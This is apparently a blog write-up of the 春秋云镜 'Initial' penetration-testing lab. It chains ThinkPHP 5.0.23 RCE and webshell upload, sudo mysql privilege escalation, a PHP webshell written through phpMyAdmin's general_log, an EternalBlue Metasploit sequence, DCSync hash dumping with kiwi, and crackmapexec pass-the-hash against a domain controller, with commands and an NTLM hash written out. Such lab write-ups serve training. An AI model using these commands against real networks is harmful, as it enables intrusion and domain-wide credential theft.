[春秋云镜] Initial

[春秋云镜] Initial

            **整套网络环境拓扑:**

image

一、打进内网

开局一个ip:39.101.184.25,fscan扫一下

image

存在thinkphp5.0.23的漏洞,可以rce,我们用工具检测下,然后上传webshell

image

然后我们用蚁剑连一下,whoami看一下是www-data权限

image

我们在www目录下搜一下flag,没有搜到东西,所以我们看一下root目录下有没有flag

image

没有权限,cat /etc/sudoers​看了一下www-data也没有sudo权限,然后sudo -l​看一下

image

这里我们可以利用mysql提权,命令可以看这个网站https://gtfobins.github.io/gtfobins/mysql/#sudo,最后在/root/flag/flago1.txt找到 flag01: flag{60b53231-

image

到这里39.101.184.25就算是打完了,然后我们要扫内网的其他机器

二、横向移动

ifconfig​看一下内网网段,是172.22.1.15

image

传一个fscan上去,然后扫内网

image

start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.1.2      is alive
(icmp) Target 172.22.1.18     is alive
(icmp) Target 172.22.1.15     is alive
(icmp) Target 172.22.1.21     is alive
[*] Icmp alive hosts len is: 4
172.22.1.18:3306 open
172.22.1.21:445 open
172.22.1.18:445 open
172.22.1.2:445 open
172.22.1.21:139 open
172.22.1.18:139 open
172.22.1.2:139 open
172.22.1.21:135 open
172.22.1.18:135 open
172.22.1.2:135 open
172.22.1.18:80 open
172.22.1.15:80 open
172.22.1.15:22 open
172.22.1.2:88 open
[*] alive ports len is: 14
start vulscan
[*] NetInfo 
[*]172.22.1.21
   [->]XIAORANG-WIN7
   [->]172.22.1.21
[*] NetInfo 
[*]172.22.1.2
   [->]DC01
   [->]172.22.1.2
[+] MS17-010 172.22.1.21	(Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetInfo 
[*]172.22.1.18
   [->]XIAORANG-OA01
   [->]172.22.1.18
[*] OsInfo 172.22.1.2	(Windows Server 2016 Datacenter 14393)
[*] WebTitle http://172.22.1.15        code:200 len:5578   title:Bootstrap Material Admin
[*] NetBios 172.22.1.18     XIAORANG-OA01.xiaorang.lab          Windows Server 2012 R2 Datacenter 9600
[*] NetBios 172.22.1.21     XIAORANG-WIN7.xiaorang.lab          Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] NetBios 172.22.1.2      [+] DC:DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393
[*] WebTitle http://172.22.1.18        code:302 len:0      title:None 跳转url: http://172.22.1.18?m=login
[*] WebTitle http://172.22.1.18?m=login code:200 len:4012   title:信呼协同办公系统
[+] PocScan http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1
已完成 14/14
[*] 扫描结束,耗时: 11.658844283s

可以看到有 172.22.1.2、172.22.1.18、172.22.1.15、172.22.1.21四台机器存活,172.22.1.15忽略,172.22.1.18是个信呼OA的系统,172.22.1.21是台存在永恒之蓝漏洞的win7,172.22.1.2是个域控。接下来就是挂代理,去打内网,这里我用的 NPS+Proxifier

服务端设置好隧道

image

然后把nps的clint端配置传上去,连一下服务端,这里可以看到客户端已经成功上线

image

image

然后就是Proxifier连接,我们先打172.22.1.18 信呼OA

image

这样就连上了,然后设置下网段,就通到内网了

image

这里我们用dirsearch扫目录,发现有/phpmyadmin,而且存在弱口令root/root,我们登陆进去后利用日志写入webshell

image

第一步先执行show variables like 'general%';​查看是否开启日志以及存放的日志位置

image

第二步set global general_log = ON;​开启日志

image

第三步set global general_log_file​设置日志保存位置

image

最后select '<?php eval($_POST[cmd]);?>';​写入webshell,然后蚁剑连接,flag02 在C:/Users/Administrators/flag​下面, flag02: 2ce3-4813-87d4-

image

然后看 172.22.1.21,是台 Win7 的机子,可以打 MS17-010 ,试了一下不出网,采用正向监听即可

先挂代理,proxychains4​走 socks5 流量:

proxychains4使用看这个:https://zhuanlan.zhihu.com/p/427655655

vim /etc/proxychains4.conf​,把最后一行注释掉,然后写上代理配置:协议 代理ip 端口

proxychains msfconsole​,然后依次use exploit/windows/smb/ms17_010_eternalblue​=>set payload windows/x64/meterpreter/bind_tcp_uuid​=>set RHOSTS 172.22.1.21​=>exploit

image

得到正向的 meterpreter shell 后,接下来就是利用 DCSync,可以参考这个文章:https://www.cnblogs.com/CoLo/p/16488892.html

在 MSF 下直接load kiwi​,然后kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit​导出域内所有用户的 Hash

image

拿到所有用户的hash后就好办了,172.22.1.2 的 445 端口开放,利用 smb 哈希传递,直接用 kali 自带的 crackmapexec,proxychains4 crackmapexec smb 172.22.1.2 -u administrator -H 10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "$cmd"​,最后一部分 flag03 在/Users/Administrator/flag​下

image

总的 flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6},这套企业环境就打完了

posted @ 2024-06-22 18:57  MiaCTFer  阅读(59)  评论(0编辑  收藏  举报